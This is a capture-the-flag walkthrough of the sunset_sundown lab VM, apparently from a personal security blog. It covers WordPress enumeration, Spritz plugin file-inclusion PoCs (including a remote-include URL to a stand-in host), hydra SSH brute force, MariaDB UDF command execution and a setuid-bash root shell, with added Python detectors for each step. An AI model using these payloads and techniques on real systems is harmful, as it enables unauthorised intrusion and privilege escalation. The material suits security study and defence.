sunset_sundown target machine

Information gathering

```
┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.152
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-11 06:01 EDT
Nmap scan report for 192.168.56.152
Host is up (0.000091s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A1:1B:DA (Oracle VirtualBox virtual NIC)
```

Web penetration testing

The exposed surface is small, so start with port 80.

It looks like a WordPress site, so scan it with wpscan.

```
┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ wpscan --url http://192.168.56.152/ -e u,ap

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://192.168.56.152/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.152/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.152/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.152/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.152/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.152/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://192.168.56.152/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentynineteen
 | Location: http://192.168.56.152/wp-content/themes/twentynineteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.168.56.152/wp-content/themes/twentynineteen/readme.txt
 | [!] The version is out of date, the latest version is 2.5
 | Style URL: http://192.168.56.152/wp-content/themes/twentynineteen/style.css?ver=1.5
 | Style Name: Twenty Nineteen
 | Style URI: https://wordpress.org/themes/twentynineteen/
 | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.152/wp-content/themes/twentynineteen/style.css?ver=1.5, Match: Version: 1.5

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] wp-with-spritz
 | Location: http://192.168.56.152/wp-content/plugins/wp-with-spritz/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2015-08-20T20:15:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.2.4 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.152/wp-content/plugins/wp-with-spritz/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.152/wp-json/wp/v2/users/?per_page=100&page=1
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
```

A plugin was found; search for known vulnerabilities in it.

```
┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ searchsploit spritz
----------------------------------------------------------------
 Exploit Title                                              | Path
----------------------------------------------------------------
WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion | php/webapps/44544.php
----------------------------------------------------------------
Shellcodes: No Results
```

There is a file inclusion vulnerability, and the exploit file gives two PoCs:

```
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec
```

First, try local file inclusion.

It worked and revealed a username, carlos. Next, try to read the usual sensitive files: the shadow file, the WordPress configuration file, SSH private keys, and the Apache log files.

The only one that yielded anything was the WordPress configuration file.

It contained the database password. Tried that password for SSH login and for the WordPress login; both failed.

Then tried the plugin's second PoC to test remote file inclusion, but hit a problem: the remote file was fetched, yet it was not parsed by PHP, so the reverse shell failed.
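Both PoCs leave a distinctive trace in the Apache access log, so this added example (not part of the original write-up) shows a small detector for traversal and remote-include attempts against the spritz handler. The handler path and site address are the ones from the scan above; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Handler of the vulnerable plugin and this site's own host, both taken from the scan above.
SPRITZ_HANDLER = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"
SITE_HOST = "192.168.56.152"

# Apache combined log: client, ident, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def classify(target):
    """Return 'traversal', 'remote' or None for one request target aimed at the handler."""
    parts = urlsplit(target)
    if parts.path != SPRITZ_HANDLER:
        return None
    # parse_qs decodes once; decode twice more so a double-encoded ../ is still caught.
    value = unquote(unquote(parse_qs(parts.query).get("url", [""])[0]))
    m = re.match(r"^([a-z][a-z0-9+.-]*)://([^/?#]*)", value, re.I)
    if m:
        scheme, host = m.group(1).lower(), m.group(2).lower()
        if scheme in ("http", "https") and host == SITE_HOST:
            return None  # the plugin fetching one of this site's own posts
        return "remote"  # foreign host (second PoC) or a stream wrapper such as php://
    if "../" in value or "..\\" in value or value.startswith("/"):
        return "traversal"  # first PoC: url=/../../../..//etc/passwd
    return None

def scan_access_log(lines):
    """Return (ip, timestamp, kind, status) for every suspicious spritz request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (kind := classify(m["target"])):
            hits.append((m["ip"], m["ts"], kind, int(m["status"])))
    return hits

# Constructed sample log lines modelled on the requests made in this write-up.
H = SPRITZ_HANDLER
SAMPLE_LOG = [
    f'192.168.56.1 - - [11/Oct/2023:06:10:01 -0400] "GET {H}?url=/../../../..//etc/passwd HTTP/1.1" 200 1432 "-" "curl/8.3.0"',
    f'192.168.56.1 - - [11/Oct/2023:06:12:44 -0400] "GET {H}?url=http://192.168.56.1/x.txt HTTP/1.1" 200 88 "-" "curl/8.3.0"',
    f'192.168.56.20 - - [11/Oct/2023:06:13:05 -0400] "GET {H}?url=http://192.168.56.152/?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.56.20 - - [11/Oct/2023:06:13:09 -0400] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]
```

A 200 on a traversal request is the strongest signal: it means the include actually served the file, which is exactly what happened with /etc/passwd above.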

SSH brute force

Next, tried brute-forcing the SSH password for the carlos user directly, as well as the WordPress admin password.

```
┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ hydra -l carlos -P /usr/share/wordlists/rockyou.txt 192.168.56.152 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-10-11 22:45:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.152:22/
[22][ssh] host: 192.168.56.152   login: carlos   password: carlos
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
```
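A hydra run like the one above produces a burst of sshd "Failed password" lines from one source, followed by an "Accepted password" for the same user. This added example (not from the original write-up) shows a detector over auth.log that reports both the burst and the success-after-failures; the log lines are constructed and the year is assumed, since syslog timestamps carry none.

```python
import re
from collections import defaultdict
from datetime import datetime

# Debian auth.log lines written by sshd (year is not logged, so it is supplied below).
FAILED_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                       r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")
ACCEPTED_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                         r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>\S+)")

def parse_ts(text, year=2023):
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(lines, threshold=10, window_s=60):
    """Return findings as (kind, ip, user, count):
    'burst' when one ip fails >= threshold times for one user inside window_s seconds,
    'success_after_failures' when an accepted login follows recorded failures."""
    failures = defaultdict(list)   # (ip, user) -> timestamps of recent failures
    findings, reported = [], set()
    for line in lines:
        if m := FAILED_RE.match(line):
            key, t = (m["ip"], m["user"]), parse_ts(m["ts"])
            failures[key] = [x for x in failures[key] if (t - x).total_seconds() <= window_s]
            failures[key].append(t)
            if len(failures[key]) >= threshold and key not in reported:
                findings.append(("burst", m["ip"], m["user"], len(failures[key])))
                reported.add(key)
        elif m := ACCEPTED_RE.match(line):
            key = (m["ip"], m["user"])
            if failures.get(key):
                findings.append(("success_after_failures", m["ip"], m["user"], len(failures[key])))
                failures.pop(key)
    return findings

# Constructed sample: twelve failures in eleven seconds, then the accepted login.
SAMPLE_AUTH_LOG = [
    f"Oct 11 22:45:{31 + i:02d} sundown sshd[{1200 + i}]: Failed password for carlos "
    f"from 192.168.56.1 port {40000 + i} ssh2"
    for i in range(12)
] + ["Oct 11 22:45:44 sundown sshd[1212]: Accepted password for carlos from 192.168.56.1 port 40012 ssh2"]
```

With hydra's default 16 parallel tasks the real burst is far denser than the sample, so a threshold of 10 in 60 seconds fires within the first second of the attack.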

The brute force yielded the SSH password; log in and look around.

```
┌──(kali㉿kali)-[~/Documents/sunset_sundown]
└─$ ssh carlos@192.168.56.152
carlos@192.168.56.152's password:
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64

The programs included with the Debian GNU/Linux system are free software;

carlos@sundown:~$ sudo -l
[sudo] password for carlos:
Sorry, user carlos may not run sudo on sundown.
```

Privilege escalation: information gathering

Check the environment and the files in the home directory.

```
carlos@sundown:~$ ls -alih
total 28K
134541 drwxr-xr-x 3 carlos carlos 4.0K Aug  3  2020 .
131078 drwxr-xr-x 3 root   root   4.0K Aug  3  2020 ..
134958 lrwxrwxrwx 1 root   root      9 Aug  3  2020 .bash_history -> /dev/null
134542 -rw-r--r-- 1 carlos carlos  220 Aug  3  2020 .bash_logout
134544 -rw-r--r-- 1 carlos carlos 3.5K Aug  3  2020 .bashrc
135949 drwxr-xr-x 3 carlos carlos 4.0K Aug  3  2020 .local
134977 -rw------- 1 carlos carlos   33 Aug  3  2020 local.txt
135567 lrwxrwxrwx 1 root   root      9 Aug  3  2020 .mysql_history -> /dev/null
134543 -rw-r--r-- 1 carlos carlos  807 Aug  3  2020 .profile
carlos@sundown:~$ cat local.txt
28f84888f6bd690e321cba14659b32f2
```

Check for SUID files.

```
carlos@sundown:~$ find / -type f -perm -04000 -ls 2>/dev/null
 10540    428 -rwsr-xr-x   1 root     root       436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
136894     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
  6833     52 -rwsr-xr--   1 root     messagebus  51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  3910     36 -rwsr-xr-x   1 root     root        34888 Jan 10  2019 /usr/bin/umount
  3436     44 -rwsr-xr-x   1 root     root        44440 Jul 27  2018 /usr/bin/newgrp
    55     84 -rwsr-xr-x   1 root     root        84016 Jul 27  2018 /usr/bin/gpasswd
  3583     64 -rwsr-xr-x   1 root     root        63568 Jan 10  2019 /usr/bin/su
  3908     52 -rwsr-xr-x   1 root     root        51280 Jan 10  2019 /usr/bin/mount
 17572    156 -rwsr-xr-x   1 root     root       157192 Feb  2  2020 /usr/bin/sudo
    53     44 -rwsr-xr-x   1 root     root        44528 Jul 27  2018 /usr/bin/chsh
    56     64 -rwsr-xr-x   1 root     root        63736 Jul 27  2018 /usr/bin/passwd
    52     56 -rwsr-xr-x   1 root     root        54096 Jul 27  2018 /usr/bin/chfn
```

Tried using the database password to switch to root; that failed.

Then logged into the database and looked at the password hashes, but cracking them against online lookup sites failed.

UDF privilege escalation

It then occurred to me that the database password might have gone unused so far because it is only needed during privilege escalation. So check how mysql is running, and in particular whether it runs as root, which would make UDF privilege escalation an option.

```
carlos@sundown:/tmp$ ps aux | grep mysql
root       357  0.0  0.0    2388   696 ?        Ss   05:59   0:00 /bin/sh -c /usr/sbin/mysqld
root       361  0.1 11.7 1284380 119124 ?       Sl   05:59   0:18 /usr/sbin/mysqld
carlos    1710  0.0  0.0    6076   824 pts/0    S+   09:01   0:00 grep mysql
```

It does, so check whether the other prerequisites for UDF privilege escalation are met.

```
MariaDB [wordpress_db]> show variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.001 sec)

MariaDB [(none)]> show variables like '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
```

This looks promising. Checking the permissions on the plugin directory showed it cannot be written to directly, so write into it through MySQL instead. I followed the write-up "MySQL UDF 提权十六进制查询" (MySQL UDF privilege escalation via hex query) by 国光 (sqlsec.com); remember to change the plugin directory that the file is written to.

```
MariaDB [(none)]> CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> select * from mysql.func;
+----------+-----+--------+----------+
| name     | ret | dl     | type     |
+----------+-----+--------+----------+
| sys_eval |   0 | udf.so | function |
+----------+-----+--------+----------+
1 row in set (0.000 sec)

MariaDB [(none)]> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| root               |
+--------------------+
1 row in set (0.005 sec)
```
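The three conditions checked above (mysqld running as root, an empty secure_file_priv, and a writable plugin_dir) together with the mysql.func row are exactly what a hardening or incident-response check should look for. This added example (not from the original write-up) parses the mariadb client output shown above and audits it; the sample strings are the outputs captured in this write-up, and the list of sys_* function names is the one exported by the common UDF shell library.

```python
def parse_mariadb_table(text):
    """Parse the ASCII table printed by the mariadb client into a list of row dicts."""
    rows = [line.strip() for line in text.splitlines() if line.strip().startswith("|")]
    cells = [[c.strip() for c in row.strip("|").split("|")] for row in rows]
    return [dict(zip(cells[0], r)) for r in cells[1:]]

# Function names exported by the widely copied lib_mysqludf_sys shell library.
SHELL_UDF_NAMES = {"sys_eval", "sys_exec", "sys_get", "sys_set"}

def audit_udf_exposure(variables, mysqld_user, func_rows):
    """variables: {name: value} from SHOW VARIABLES; mysqld_user: owner of the mysqld
    process; func_rows: rows of mysql.func. Returns (severity, message) pairs."""
    findings = []
    if mysqld_user == "root":
        findings.append(("high", "mysqld runs as root, so any loaded UDF executes as root"))
    sfp = variables.get("secure_file_priv", "")
    plugin_dir = variables.get("plugin_dir", "")
    if sfp == "":
        findings.append(("high", "secure_file_priv is empty: SELECT ... INTO DUMPFILE "
                                 "may write into plugin_dir " + plugin_dir))
    elif sfp.upper() != "NULL" and plugin_dir.startswith(sfp.rstrip("/") + "/"):
        findings.append(("high", f"secure_file_priv ({sfp}) contains plugin_dir ({plugin_dir})"))
    for row in func_rows:
        name, dl = row.get("name", ""), row.get("dl", "")
        if name in SHELL_UDF_NAMES:
            findings.append(("critical", f"mysql.func loads {dl} as {name}: command-execution UDF installed"))
        else:
            findings.append(("review", f"mysql.func loads {dl} as {name}: confirm this UDF is expected"))
    return findings

# Client output captured in this write-up (header and data rows only), reused as sample input.
SECURE_FILE_PRIV_OUT = "| Variable_name    | Value |\n| secure_file_priv |       |"
PLUGIN_OUT = ("| Variable_name   | Value                                       |\n"
              "| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |\n"
              "| plugin_maturity | gamma                                       |")
FUNC_OUT = "| name     | ret | dl     | type     |\n| sys_eval |   0 | udf.so | function |"

def audit_from_outputs():
    """Run the audit over the captured outputs; 'root' comes from the ps aux listing above."""
    variables = {}
    for out in (SECURE_FILE_PRIV_OUT, PLUGIN_OUT):
        for row in parse_mariadb_table(out):
            variables[row["Variable_name"]] = row["Value"]
    return audit_udf_exposure(variables, "root", parse_mariadb_table(FUNC_OUT))
```

Setting secure_file_priv to NULL (or to a directory outside plugin_dir) and running mysqld as the mysql user removes two of the three preconditions; the mysql.func check catches a UDF that is already installed.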

Privilege escalation succeeded. I wanted a reverse shell but could not get a stable one, so instead set the setuid bit on the bash binary.

```
MariaDB [(none)]> select sys_eval('chmod +s /bin/bash');
+--------------------------------+
| sys_eval('chmod +s /bin/bash') |
+--------------------------------+
| NULL                           |
+--------------------------------+
1 row in set (0.004 sec)

MariaDB [(none)]> select sys_eval('ls -liah /bin/bash');
+---------------------------------------------------------+
| sys_eval('ls -liah /bin/bash')                          |
+---------------------------------------------------------+
| 1411 -rwsr-sr-x 1 root root 1.2M Apr 18  2019 /bin/bash |
+---------------------------------------------------------+
1 row in set (0.004 sec)
```
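A setuid-root /bin/bash is the kind of persistence that a periodic SUID audit should catch immediately. This added example (not from the original write-up) parses `find / -perm -04000 -ls` output, compares it with the baseline listed earlier on this box, and flags setuid shells or interpreters regardless of baseline; the /bin/bash line is constructed from the ls output above.

```python
import re

# One line of `find -ls`: inode, blocks, mode, links, owner, group, size, date (3 fields), path.
FIND_LS_RE = re.compile(
    r"^\s*\d+\s+\d+\s+(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>\S+)$")

# Programs that hand out an interactive shell or interpreter: setuid on these is instant root.
SHELL_LIKE = {"bash", "sh", "dash", "zsh", "python", "python3", "perl", "php"}

def audit_suid(find_ls_lines, baseline):
    """Return (path, reason) for every setuid file that is shell-like or not in the baseline."""
    findings = []
    for line in find_ls_lines:
        m = FIND_LS_RE.match(line)
        if not m:
            continue
        mode, owner, path = m["mode"], m["owner"], m["path"]
        if mode[3] not in "sS":          # owner-execute position carries the setuid bit
            continue
        setgid = mode[6] in "sS"         # group-execute position carries the setgid bit
        name = path.rsplit("/", 1)[-1]
        if name in SHELL_LIKE:
            findings.append((path, f"setuid {owner} shell/interpreter"))
        elif path not in baseline:
            extra = ", also setgid" if setgid else ""
            findings.append((path, f"setuid {owner} binary not in baseline{extra}"))
    return findings

# Baseline: the setuid files found on this box before the chmod.
BASELINE = {
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/bin/umount", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/bin/su", "/usr/bin/mount", "/usr/bin/sudo", "/usr/bin/chsh",
    "/usr/bin/passwd", "/usr/bin/chfn",
}

# Sample: three lines from the listing above plus a constructed line for the modified bash.
SAMPLE_FIND_LS = [
    " 10540    428 -rwsr-xr-x   1 root     root       436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign",
    "  6833     52 -rwsr-xr--   1 root     messagebus  51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    " 17572    156 -rwsr-xr-x   1 root     root       157192 Feb  2  2020 /usr/bin/sudo",
    "  1411   1168 -rwsr-sr-x   1 root     root      1168776 Apr 18  2019 /bin/bash",
]
```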

Now running /bin/bash -p directly gives a root shell.

```
bash-5.0# cd /root
bash-5.0# ls
proof.txt
bash-5.0# cat proof.txt
_____,,,\//,,\\,/,
/-- --- --- -----
///--- --- -- - ----
o////- ---- --- --
!!//o/--- -- --
o*) !///,~,,\\,\/,,/,//,,
o!*!o'(\ /\
| ! o ",) \/\ /\ / \/\
o !o! !!| \/ \/ /
( * ( o!'; |\ \ /
o o ! * !` | \ / \
o | o 'o| | : \ /
* o !*!': |o| / /
(o''| `| : / /
! *|'` \|/ \\
' !o!':\ \\ \
( ('| \ `._______/
////\\\,,\///,,,,\,/oO._* o !*!'` `.________/
---- -- ------- - -oO*OoOo (o''| /
-------- ------ 'oO*OoO!*|'o!! \
------- -- - ---- --* oO*OoO *!'| ' /
--- - ----- ---- - oO*OoO!!':o!' /
- - ----- - -- - *--oO*OoOo!` /
\\\\\,,,\\,//////,\,,\\\/,,,\,,ejm/AMC

510252fabb4b7e7dddd7373b7b3da3e8

Thanks for playing - Felipe Winsnes (@whitecr0wz)
```

The final glamour shot

```
bash-5.0# whoami
root
bash-5.0# id
uid=1000(carlos) gid=1000(carlos) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(carlos)
bash-5.0# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:a1:1b:da brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.152/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 399sec preferred_lft 399sec
    inet6 fe80::a00:27ff:fea1:1bda/64 scope link
       valid_lft forever preferred_lft forever
bash-5.0# uname -a
Linux sundown 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
```

sunset_sundown target machine
https://i3eg1nner.github.io/2023/10/d108ba760c3e.html
Author: I3eg1nner
Published: October 12, 2023